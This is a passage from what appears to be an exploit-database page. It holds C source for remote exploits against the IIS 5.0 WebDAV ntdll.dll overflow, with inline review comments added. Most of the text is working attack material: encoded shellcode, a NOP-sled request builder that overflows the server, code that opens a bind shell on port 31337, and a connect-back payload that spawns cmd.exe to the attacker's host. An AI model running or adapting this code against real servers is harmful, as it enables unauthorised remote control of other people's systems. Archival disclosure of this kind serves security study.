"\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99"
"\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99"
"\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9"
"\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9"
"\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c"
"\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc"
"\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9"
"\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9"
"\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c"
"\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99"
"\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89"
"\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3"
"\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1"
"\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf"
"\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9"
"\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66"
"\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99"
"\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf"
"\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32"
"\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14"
"\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3"
"\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59"
"\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66"
"\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b"
"\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99"
"\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9"
"\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf"
"\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66"
"\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9"
"\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99"
"\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf"
"\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9"
"\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6"
"\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe"
"\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8"
"\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66"
"\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14"
"\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34"
"\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9"
"\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x1c\xf8"
"\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8"
"\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c"
"\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x70\x20"
"\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
"\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
"\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1"
"\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8"
"\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d"
"\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2"
"\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\xf7\xfd"
"\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\xe9\xed"
"\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\xf5\xf6"
"\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\xd7\xdc"
"\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\xe9\xfc"
"\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\xf7\xff"
"\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\xfa\xfc"
"\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9"
"\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\xf5\xf6"
"\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0"
"\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x99\xda"
"\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\xe1\xf0"
"\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\xfc\xfd"
"\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\xf8\xf7"
"\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xa7"
"\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99"
"\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
"\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";
/* Short stub that main() copies to the very end of the padded request-URI,
 * immediately before " HTTP/1.1".  Its bytes are used verbatim; only
 * strlen(jumpcode) is consulted when sizing the NOP run that precedes it,
 * so it must not contain a NUL byte. */
unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
/* WebDAV SEARCH request body (a DAV: searchrequest document).  main()
 * appends it after the headers; its length is counted in Content-Length
 * together with strlen(shellcode). */
char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n"
"</g:searchrequest>\r\n";
/*
 * Print the program banner and command-line synopsis to stdout, then
 * terminate the process with status -1.  Never returns.
 *
 * prog: argv[0], echoed into the "Usage:" line.
 */
void usage(char *prog)
{
	fprintf(stdout,
	        "Remote Exploit for IIS 5.0 WebDAV by Xnuxer\n"
	        "Bug overflow NTDLL.DLL\n"
	        "Usage: %s <victim>\n",
	        prog);
	exit(-1);
}
/*
 * Interactive relay between the local terminal and an already-connected
 * socket: data arriving on `sock` is copied to stdout (fd 1), data typed
 * on stdin (fd 0) is copied to `sock`.  Terminates the whole process via
 * exit() on EOF or error from either side.
 *
 * NOTE(review): fd_read is never cleared with FD_ZERO before the two
 * FD_SET calls, so the set starts uninitialised and select() may report
 * descriptors that were never added.  The return values of both write()
 * calls are ignored, so short writes are silently dropped.  The
 * close(sock) after the loop is reachable only when select() itself fails.
 */
void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
/* sock+1 as nfds assumes sock is the highest descriptor in the set (fd 0 is stdin). */
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
/* Peer closed the connection: report and leave the process. */
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}
if ( FD_ISSET(0, &fd_read) ) {
/* EOF on stdin is treated like a read error. */
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}
/*
 * Entry point.  Resolves argv[1], patches the callback port and the two
 * hard-coded addresses into shellcode[], builds one WebDAV SEARCH request
 * whose request-URI is padded out to roughly 64 KiB (the overlong request
 * line is the ntdll.dll overflow this page documents), sends it to TCP/80,
 * sleeps, then tries to connect to TCP/31337 on the same host and hands
 * that socket to shell() if the connection succeeds.
 *
 * Returns 0 after shell() returns; every failure path calls exit(-1).
 *
 * NOTE(review): `sock` is closed only on the final two paths, so the
 * earlier exit() calls leave it to the OS.  he->h_length is copied into
 * sin_addr without being checked against sizeof(sin_addr), and the local
 * `h` is never used.  Content-Length advertises strlen(body) +
 * strlen(shellcode), but the 0x01 marker byte and the three NOPs written
 * between body and shellcode are sent as well, so the header under-counts
 * the actual body by 4 bytes.  `%d` is used for a size_t sum.
 */
int main(int argc, char **argv)
{
struct hostent *he;
struct sockaddr_in sock1;
struct sockaddr_in sock2;
unsigned short port;
unsigned long ret=RET;
/* Whole request is assembled here; it is zeroed below so every strlen()
 * based append sees a terminated string. */
char buffer[100000];
int sock, sck, h,i,j;
if (argc != 2) usage(argv[0]);
printf("Resolving %s .. ", argv[1]);
if ((he = gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "Unknown host\n");
exit(-1);
}
printf("Resolved\n");
/* Callback port in network byte order, masked with 0x9999 before being
 * stored in the payload; the two addresses below are masked with
 * 0x99999999 the same way.  These are unaligned type-punned stores
 * (strictly undefined in C, tolerated on x86). */
port = htons(31337);
port ^= 0x9999;
*(unsigned short *)&shellcode[PORT_OFFSET] = port;
*(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
*(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
bcopy(he->h_addr, &sock1.sin_addr, he->h_length);
sock1.sin_family = AF_INET;
sock1.sin_port = htons(80);
printf("[+] Attacking to %s via port: 80\n", argv[1]);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("Failed to create socket");
exit(-1);
}
if (connect(sock, (struct sockaddr *)&sock1, sizeof(sock1)) == -1)
{
perror("Failed to connect");
exit(-1);
}
bzero(buffer,100000);
/* Request line: "SEARCH /", one NOP, ~2150 bytes of the 16-bit RET
 * value, NOPs up to a total of 65535 bytes, then jumpcode, then
 * " HTTP/1.1".  j is advanced by 2 in the first loop because each
 * store writes an unsigned short. */
strcpy(buffer,"SEARCH /");
i = strlen(buffer);
buffer[i] = NOP;
for (j=i+1; j < i+2150; j+=2)
*(unsigned short *)&buffer[j] = (unsigned short)ret;
for (; j < i+65535-strlen(jumpcode); j++)
buffer[j] = NOP;
memcpy(&buffer[j], jumpcode, strlen(jumpcode));
strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\n"
"Content-Length: %d\r\n\r\n", argv[1], strlen(body)
+ strlen(shellcode));
strcpy(buffer+strlen(buffer), body);
/* Single 0x01 byte, then three NOPs, then the payload; none of these
 * may contain a NUL because the request is sent with strlen(buffer). */
memset(buffer+strlen(buffer), 0x01, 1);
memset(buffer+strlen(buffer), NOP, 3);
strcpy(buffer+strlen(buffer), shellcode);
/* Signed/unsigned comparison: send() returns ssize_t, strlen() size_t. */
if (send(sock, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("Failed to send");
exit(-1);
}
printf("[+] Overflow sent, waiting for 5 seconds\n");
sleep(5);
/* Second connection, to the same host, on the port patched in above. */
bcopy(he->h_addr, &sock2.sin_addr, he->h_length);
sock2.sin_family = AF_INET;
sock2.sin_port = htons(31337);
printf("[+] Connecting to %s: 31337\n", argv[1]);
if ((sck = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("Failed to create socket");
exit(-1);
}
if (connect(sck, (struct sockaddr *)&sock2, sizeof(sock2)) == -1)
{
printf("[+] Unable to connect.\n"
"[+] Exploitation failed, maybe blocked by firewall.\n");
close(sock);
close(sck);
exit(-1);
}
close(sock);
printf("[+] Successfull, attempting to join shell ...\n\n");
shell(sck);
return 0;
}
// milw0rm.com [2003-07-08]
Exploit Database EDB-ID : 36
Publication date : 2003-05-31 22h00 +00:00
Author : alumni
EDB Verified : Yes
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* 29/05/2003 - by Alumni - */
/* Microsoft IIS WebDAV New Exploit */
/* spawns shell on port 32768 */
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
#include <stdio.h>
#include <winsock.h>
#include <windows.h>
/* Length in bytes of shellcode[] below (the array is declared one byte
 * larger to keep the string terminator).  main() also patches this value
 * into prologue[] at SOFF. */
#define SHELLCODELEN 753
#define NOP 0x90
/* Default total payload size; overridable as argv[3] (see main). */
#define BUFFERLEN 1024
/* Default return address, overridable as argv[4].  0x41424344 is "ABCD",
 * which looks like a placeholder rather than a working value. */
#define RET 0x41424344
/* Byte offsets into shellcode[] that main() overwrites at run time:
 * GetModuleHandle address, GetProcAddress address, and the local IPv4
 * address returned by getlocalhostip(). */
#define GMHOFF 30
#define GPAOFF 38
#define IPOFF 161
/* Port that AcceptThread() listens on for the callback connection. */
#define DEFPORT 32768
/* When DEBUGGEE_FLOW is defined, main() skips argument parsing and
 * SendRequest() and instead calls the assembled buffer in-process via
 * inline asm; GMH/GPA then resolve to this process's real addresses. */
//#define DEBUGGEE_FLOW // for debug only
#ifdef DEBUGGEE_FLOW
#define GMH (long)GetModuleHandle
#define GPA (long)GetProcAddress
#else
#define GMH 0x0100107C // GetModuleHandle@
#define GPA 0x01001034 // GetProcAddress@
#endif
/* Byte offsets into prologue[] that main() overwrites: the one-byte XOR
 * key (XOROFF) and the 16-bit encoded length (SOFF). */
#define XOROFF 11
#define SOFF 16
/* Decoder stub that main() places in front of the XOR-encoded shellcode.
 * Two fields are filled in at run time: the key byte at index XOROFF
 * (the 0x90 placeholder after 0xB2) and the 16-bit length at SOFF (the
 * "\x04\x03" pair, replaced with SHELLCODELEN).  Because main() appends
 * it with strncat(), the stub must not contain a NUL byte. */
char prologue[] =
"\xEB\x03" // jmp $+3
"\x58" // pop eax
"\x50" // push eax
"\xC3" // retn
"\xE8\xF8\xFF\xFF\xFF" // call $-3
"\xB2" // mov dl, %key
"\x90" // %key
"\x33\xC9" // xor ecx, ecx
"\x66\xB9" // mov cx, shellcodesize
"\x04\x03" // shellcodesize = hex(SHELLCODELEN)
"\x04\x14" // add al, 0x14
"\x30\x10" // xor byte ptr[eax], dl
"\x40" // inc eax
"\x66\x49" // dec cx
"\x67\xE3\x02" // jcxz $+5
"\xEB\xF6" // jmp $-8
;
char shellcode[SHELLCODELEN+1] =
"\xe8\x5f\x02\x00\x00\x8b\xe8\x33\xf6\x66\xbe\x80"
"\x00\x03\xf4\xc7\x46\xf0\x00\x00\x00\x00\xc7\x46"
"\xf4\x00\x00\x00\x00\xb8\xf2\x12\x40\x00\x89\x46"
"\xf8\xb8\xf8\x12\x40\x00\x89\x46\xfc\x8b\xd5\x81"
"\xc2\x9e\x02\x00\x00\x52\xff\x56\xf8\x89\x46\xf4"
"\x8b\xd5\x81\xc2\xab\x02\x00\x00\x52\xff\x76\xf4"
"\xff\x56\xfc\x68\x00\x10\x00\x00\x6a\x40\xff\xd0"
"\x8b\xf8\x8b\xc7\x8b\xfe\x8b\xf0\x83\xc6\x20\x8b"
"\x47\xf8\x89\x46\xf8\x8b\x47\xf4\x89\x46\xf4\x8b"
"\x47\xfc\x89\x46\xfc\x8b\xd5\x81\xc2\x6e\x02\x00"
"\x00\x52\xff\x56\xf8\x89\x46\xf0\x8b\xd5\x81\xc2"
"\x7e\x02\x00\x00\x52\xff\x76\xf0\xff\x56\xfc\x8b"
"\xd8\x6a\x06\x6a\x01\x6a\x02\xff\xd3\x89\x06\x8b"
"\xd6\x83\xc2\x14\xb8"
"\x7f\x00\x00\x01" // put your ip here (run netcat before,
e.g. 127.0.0.1)
"\x89\x42\x04\x66\xc7\x02\x02\x00\x66\xb8"
"\x80\x00" // specify connectious port here (e.g.
32768)
"\x66\x89\x42"
"\x02\x8b\xd5\x81\xc2\x8a\x02\x00\x00\x52\xff\x76"
"\xf0\xff\x56\xfc\x8b\xd8\x6a\x10\x8b\xd6\x83\xc2"
"\x14\x52\xff\x36\xff\xd3\x83\xf8\xff\x0f\x84\x84"
"\x01\x00\x00\x8b\xd5\x81\xc2\x79\x02\x00\x00\x52"
"\xff\x76\xf0\xff\x56\xfc\x8b\xd8\x8b\xd6\x6a\x00"
"\x68\x64\x0f\x00\x00\x81\xc2\x9c\x00\x00\x00\x52"
"\xff\x36\xff\xd3\xc6\x84\x30\x9c\x00\x00\x00\x00"
"\xbb\x00\x00\x00\x00\x66\xb9\x0c\x00\x8a\x84\x2b"
"\x62\x02\x00\x00\x88\x84\x33\x90\x00\x00\x00\x43"
"\x66\x49\x66\x83\xf9\x00\x75\xe9\x8b\xfe\x81\xc7"
"\x84\x00\x00\x00\xc7\x07\x0c\x00\x00\x00\xc7\x47"
"\x04\x00\x00\x00\x00\xc7\x47\x08\x01\x00\x00\x00"
"\x8b\xfe\x8b\xd6\x8b\xce\x81\xc7\x84\x00\x00\x00"
"\x83\xc2\x0c\x83\xc1\x10\x6a\x00\x57\x51\x52\x8b"
"\xd5\x81\xc2\xc9\x02\x00\x00\x52\xff\x76\xf4\xff"
"\x56\xfc\x8b\xd8\xff\xd3\x8b\xfe\x83\xc7\x34\xc7"
"\x07\x44\x00\x00\x00\x66\xc7\x47\x30\x00\x00\xc7"
"\x47\x2c\x01\x01\x00\x00\x8b\x46\x10\x89\x47\x3c"
"\x89\x47\x40\x8b\xd6\x8b\xde\x8b\xce\x81\xc2\x90"
"\x00\x00\x00\x83\xc3\x34\x83\xc1\x78\x51\x53\x6a"
"\x00\x6a\x00\x6a\x00\x6a\x01\x6a\x00\x6a\x00\x52"
"\x6a\x00\x8b\xd5\x81\xc2\xd4\x02\x00\x00\x52\xff"
"\x76\xf4\xff\x56\xfc\x8b\xd8\xff\xd3\x8b\xd5\x81"
"\xc2\xbd\x02\x00\x00\x52\xff\x76\xf4\xff\x56\xfc"
"\x8b\xd8\xff\x76\x10\xff\xd3\x8b\xd6\x83\xc2\x08"
"\x8b\xd5\x81\xc2\xb7\x02\x00\x00\x52\xff\x76\xf4"
"\xff\x56\xfc\x8b\xd8\x68\x88\x13\x00\x00\xff\xd3"
"\x8b\xd6\x8b\xce\x81\xc2\x90\x00\x00\x00\x83\xc1"
"\x08\x8b\x5e\x08\x6a\x00\x51\x68\x70\x0f\x00\x00"
"\x52\xff\x76\x0c\x8b\xd5\x81\xc2\xe3\x02\x00\x00"
"\x52\xff\x76\xf4\xff\x56\xfc\x8b\xd8\xff\xd3\x8b"
"\xd6\x81\xc2\x90\x00\x00\x00\x6a\x00\xff\x76\x08"
"\x52\xff\x36\x8b\xd5\x81\xc2\x85\x02\x00\x00\x52"
"\xff\x76\xf0\xff\x56\xfc\x8b\xd8\xff\xd3\x8b\xd5"
"\x81\xc2\x92\x02\x00\x00\x52\xff\x76\xf0\xff\x56"
"\xfc\x8b\xd8\xff\x36\xff\xd3\xe9\x1c\xfe\xff\xff"
"\x58\x50\xc3\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f"
"\x43\x20\x20\x57\x53\x32\x5f\x33\x32\x2e\x44\x4c"
"\x4c\x00\x72\x65\x63\x76\x00\x73\x6f\x63\x6b\x65"
"\x74\x00\x73\x65\x6e\x64\x00\x63\x6f\x6e\x6e\x65"
"\x63\x74\x00\x63\x6c\x6f\x73\x65\x73\x6f\x63\x6b"
"\x65\x74\x00\x4b\x45\x52\x4e\x45\x4c\x33\x32\x2e"
"\x44\x4c\x4c\x00\x47\x6c\x6f\x62\x61\x6c\x41\x6c"
"\x6c\x6f\x63\x00\x53\x6c\x65\x65\x70\x00\x43\x6c"
"\x6f\x73\x65\x48\x61\x6e\x64\x6c\x65\x00\x43\x72"
"\x65\x61\x74\x65\x50\x69\x70\x65\x00\x43\x72\x65"
"\x61\x74\x65\x50\x72\x6f\x63\x65\x73\x73\x41\x00"
"\x52\x65\x61\x64\x46\x69\x6c\x65\x00";
char xmlbody[] ="<?xml version=\"1.0\"?>\r\n<g:searchrequest
xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\nSelect \"DAV:displayname\"
from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";
/* Shared between main(), which sets them from the defaults or argv and
 * fills `buffer`, and SendRequest(), which reads buffsize and buffer.
 * `buffer` is heap-allocated in main() with buffsize+1 bytes and never freed. */
long retaddr, buffsize;
char* buffer;
/* Returns the first IPv4 address registered for this machine's host name,
 * as a 32-bit value in network byte order, or (unsigned long)-1 when
 * gethostname() fails.
 *
 * NOTE(review): the gethostbyname() result is dereferenced without a NULL
 * check, and only the first address is used, which on a multi-homed host
 * may not be the interface the peer can reach.  inet_addr(inet_ntoa(x))
 * round-trips the same 32-bit value that inaddr.s_addr already holds.
 * The -1 error value coincides with INADDR_NONE, so the caller (main)
 * cannot distinguish failure from an address it stores unchecked at IPOFF. */
unsigned long getlocalhostip()
{
char buff[128];
in_addr inaddr;
if(!gethostname(buff,128))
{
memcpy(&inaddr,gethostbyname(buff)->h_addr,4);
return(inet_addr(inet_ntoa(inaddr)));
}
return (-1);
}
/* Worker thread started by main(): binds a TCP listener on DEFPORT (all
 * interfaces) and blocks in accept().  On the first accepted connection
 * it prints a notice and calls ExitProcess(0), ending the whole program;
 * the accepted socket itself is never read or written.  lpParam is unused.
 *
 * Returns 1 only if socket() fails; the other paths never return.
 *
 * NOTE(review): bind() and listen() results are not checked — if the port
 * is already in use, accept() fails on every iteration and the loop spins.
 * The printed message is split across two source lines on this page
 * (extraction artefact); the original literal was presumably one line. */
ULONG WINAPI AcceptThread(LPVOID lpParam)
{
int ln1;
unsigned long slisten, sacc;
sockaddr_in saddrin;
slisten = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (slisten!=INVALID_SOCKET)
{
saddrin.sin_addr.s_addr = INADDR_ANY;
saddrin.sin_family = AF_INET;
saddrin.sin_port = htons(DEFPORT);
bind(slisten,(struct sockaddr*)&saddrin,sizeof(saddrin));
listen(slisten,5);
while (1)
{
ln1 = sizeof(saddrin);
sacc = accept(slisten,(struct sockaddr*)
&saddrin,&ln1);
if (sacc!=INVALID_SOCKET)
{
printf("\n\nShell succesfully spawned on
remote host\nNetcat to %d",DEFPORT);
ExitProcess(0);
}
}
}
return (1);
}
/* Connects to sHost:iPort, sends a single WebDAV SEARCH request carrying
 * xmlbody followed by the global `buffer` as the entity body (unlike the
 * other two listings on this page, which pad the request-URI), then closes
 * the socket.  Returns 0 on success, 1 if connect() fails.
 *
 * NOTE(review): malloc() and socket() results are unchecked; buffsend is
 * never freed and the socket is not closed on the connect-failure path;
 * inet_addr() only accepts dotted-quad input and its INADDR_NONE result is
 * not checked.  The sprintf() format has four conversions (%s %d %s %s) but
 * only three arguments are passed, which is undefined behaviour.  The
 * 5-second SO_RCVTIMEO/SO_SNDTIMEO values are in milliseconds, as Winsock
 * expects.  buffsend holds buffsize+256 bytes, so the fixed header plus
 * xmlbody must stay under 256 bytes for the write to fit. */
ULONG SendRequest (char* sHost, int iPort)
{
char* buffsend;
struct sockaddr_in saddr_in;
int timeout;
unsigned long sock;
buffsend = (char*)malloc(buffsize+256);
memset(buffsend,0,buffsize+256);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
saddr_in.sin_addr.s_addr = inet_addr(sHost);
saddr_in.sin_family = AF_INET;
saddr_in.sin_port = htons(iPort);
if (!connect(sock,(struct sockaddr*)&saddr_in,sizeof(saddr_in)))
{
timeout = 5000;
setsockopt(sock,SOL_SOCKET,SO_RCVTIMEO,(char*)
&timeout,sizeof(timeout));
setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)
&timeout,sizeof(timeout));
sprintf(buffsend,"SEARCH / HTTP/1.1\r\nHost:%s\r\nContent-
Type: text/xml\r\nContent-Length: %d\r\n\r\n%s%s",strlen(xmlbody)+strlen
(buffer),xmlbody,buffer);
/* send() result is ignored; a short send is not detected. */
send (sock,buffsend,strlen(buffsend),0);
closesocket(sock);
}
else return(1);
return (0);
}
/*
 * Print the program banner and the command-line synopsis to stdout.
 *
 * str1: argv[0], echoed into the "Usage:" line.
 */
void dispUsage(char* str1)
{
	const char *banner = "IIS WebDAV exploit by Alumni - The Matrix Reloaded -\n";
	fputs(banner, stdout);
	fprintf(stdout, "Usage: %s <ipv4dot> <port> [<buffsize>] [<retaddr>]\n\n", str1);
}
/*
 * Entry point.  Initialises Winsock, takes buffer size and return address
 * from argv[3]/argv[4] (defaults BUFFERLEN/RET), starts the AcceptThread
 * listener, patches three values into shellcode[], picks a one-byte XOR
 * key under which no encoded byte is 0x00, 0x0d or 0x0a (the payload is
 * later handled with strncat/strlen and embedded in an HTTP request, so
 * those bytes would truncate or split it), encodes the shellcode, lays out
 * buffer as [NOPs][prologue][encoded shellcode][4 NOPs][retaddr repeated
 * on 4-byte alignment], dumps it to stdout, and either calls it locally
 * (DEBUGGEE_FLOW) or hands it to SendRequest().
 *
 * Returns 1 on a usage error, 0 otherwise.
 *
 * NOTE(review): argv[3]/argv[4] go through atoi()/atol() with no range
 * check — a buffsize smaller than SHELLCODELEN makes (buffsize -
 * SHELLCODELEN)/2 negative and the later loops write past the malloc'd
 * block.  malloc() and WSAStartup() results are unchecked.  shellcode[]
 * is plain char; where char is signed, bytes >= 0x80 are sign-extended
 * before the XOR in the key search, so the comparison cannot match for
 * them and only bytes below 0x80 are actually vetted.  CreateThread()
 * is given NULL for its two DWORD parameters and an unsigned long*
 * where an LPDWORD is expected; this compiles with lax settings only.
 */
int main(int argc, char** argv)
{
unsigned long uThread;
int prologuelen = 0, i;
char xorkey = 0;
/* Only used under DEBUGGEE_FLOW, as the call target for the inline asm. */
long *ptr1;
WSADATA wsadata;
WSAStartup(MAKEWORD(2,0),&wsadata);
buffsize = BUFFERLEN;
retaddr = RET;
#ifndef DEBUGGEE_FLOW
if (argc<3)
{
dispUsage(argv[0]);
return (1);
}
if (argc>=4) buffsize = atoi(argv[3]);
if (argc>=5) retaddr = atol(argv[4]);
#endif
/* +1 so buffer[buffsize] can hold the terminator written below. */
buffer = (char*) malloc(buffsize+1);
ptr1 = (long*)buffer;
memset(buffer,0,buffsize);
CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)
AcceptThread,NULL,NULL,&uThread);
/* Unaligned type-punned stores into the payload (undefined in strict C,
 * tolerated on x86). */
*(long*)(shellcode+GMHOFF) = GMH;
*(long*)(shellcode+GPAOFF) = GPA;
*(long*)(shellcode+IPOFF) = getlocalhostip();
/* Key search: first i in 0..255 for which no encoded byte is NUL, CR or LF.
 * If none qualifies, xorkey stays 0 and the shellcode is sent unencoded. */
for (i=0;i<256;i++)
{
int iBool = 1, j;
for (j=0;j<SHELLCODELEN;j++)
if ((shellcode[j]^i)==0 || (shellcode[j]^i)==0x0d
|| (shellcode[j]^i)==0x0a) iBool = 0;
if (iBool)
{
xorkey = i;
